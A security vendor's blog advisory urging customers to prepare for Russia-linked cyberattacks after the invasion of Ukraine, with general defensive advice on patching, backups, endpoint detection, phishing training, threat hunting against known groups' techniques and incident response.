Ukraine Invasion Cyberattack Preparation
Russia has engaged in an invasion in Ukraine and has issued a warning to all outside parties that all interference would be retaliated against. Cyber attacks against targets in Ukraine are nothing new, though there has been an increase lately. Although it is important to avoid prematurely attributing attacks to Russia, there is a history of Russia attacking foreign companies and nation-states. It is strongly advisable for us to prepare against any potential attacks that may land at our front doors.
Meanwhile, many countries have issued sanctions against Russia, and there have been Cyberattacks made back against Russia, including those claimed to have been executed by 3rd parties such as Anonymous.
All of this activity has many organizations concerned about what they can do to protect themselves from being exploited. We have initiated some activities with our customers to aid them in preparations to protect their networks but feel it is prudent to issue a more general statement to our entire customer base.
Fundamentally, it is your basic Cyber Security practices and procedures which are the foundation for protecting your environment. Protecting against a state actor is no different here, and although it can be a daunting task, you likely already have many of these practices already in place in your organization:
- Get Informed, Stay informed
- The situation is evolving constantly
- Ensure that all systems are patched appropriately and in a timely manner.
- Critical vulnerabilities should be patched ASAP as they are the most likely to be used in wide-scale attacks.
- Pay special attention to anything that is:
- publicly facing (VPNs, firewalls, web servers and applications, etc.)
- has end users directly on the console (Workstations/Laptops)
- Ensure that all critical systems have been backed up. If you are compromised, a full recovery relies on functional backups.
- Ensure that your backup systems have been tested recently for recovery.
- Offline storage is a priority for cyber attacks. Make sure that you have a copy of your data.
- It is unlikely that cyber attacks would physically damage on-site backups so if you don’t have an offsite backup plan, you should still build one (but its less important than establishing offline backups ASAP).
- Follow proper backup practices and ensure that that the data is “pulled” from the source, instead of “pushed” to the target. This ensures that if a system is compromised, it cannot delete, encrypt, or otherwise render already created backups unusable for online or rapid recovery media.
- Security Signature updates
- Ensure that all information security systems are configured appropriately.
- All endpoints should have antimalware and monitoring software (EDR) deployed. Even some of the free EDR tools out there are worthwhile, although missing some enterprise features; They are better than not having any at all.
- Network Intrusion Detection/Prevention Systems should have up-to-date signatures and be configured to automatically pull updates from the source.
- Signature packs for IPS and IDS sensors should be configured for the appropriate targets in the environment
- IOC based alerting can be useful, but only if you have the most up to date IOC signatures. Out of Date IOCs are going to be ineffective at best. At worst they will be distracting your response team from where they should be really focusing attention.
- User Awareness Training
- Targeting users is a tactic that is ever popular, especially with APTs affiliated with Russia and the Russian State.
- Ensuring that your users are equipped to be resistant against phishing could be the key that prevents your organization from being compromised.
- Conduct phishing awareness and testing campaigns by sending phishing content to your users and measuring their effectiveness in order to identify weak spots.
- Perform Threat Hunting
- Many state actors, Russia included, have a list of known TTPs (Tactics, Techniques and Procedures) that are commonly employed by those organizations.
- MITRE ATT&CK is incredibly useful for identifying specific TTPs for state actors. APT28, APT29, Garmaredon Group, Indrik Spider, TEMP.Veles, Sandworm Team, Silence, Turla, Wizard Spider are all groups that have been identified as Russian attackers or groups that target Ukrainian targets.
- Canadian Center for Cyber Security has issued a bulletin regarding Russian State-sponsored cyber threats to Canadian Infrastructure Operators. It also references the US Cybersecurity & Infrastructure Security Agency (CISA) Alert revised earlier this week regarding Russian Cyber Threats to US Critical Infrastructure.
- Identify any potential TTPs on your network, specifically focused on those used by active groups. Log monitoring, system and network monitoring, are all tools that are useful in threat hunting.
- Test Security Tooling
- Using the list of TTPs likely used in an attack, recreate them in your environment and validate that your security tooling can identify those threats.
- There are many tools from paid threat simulation tools (Metasploit, Cymulate) to open-source tooling (Atomic Red Team by RedCanary) which can be used to simulate specific attacks in your organization.
- Respond to incidents
- Its not just enough to know you are being attacked but you need a plan to respond to an attack. Incident Response Plans and Business Continuity Plans can assist when an attack occurs in your environment.
- If you have your own incident response team, you can run tabletop exercises to practice.
Secure Sense recommends that you take proactive and deliberate steps to harden your environment reducing the likelihood of significant impact to your organization. A combination of strong preventative technologies coupled with detective practices will help minimize any effects. If you need assistance with any of these steps, or would like to discuss what you can do to secure your organization and infrastructure, email us at firstname.lastname@example.org.
Secure Sense is the security provider that cares. We are a team of experts with a passion for IT and protecting your organization is what motivates us daily. If you have questions or want to learn more about how we can improve your organization’s security, our services or just want to chat security please give us a shout.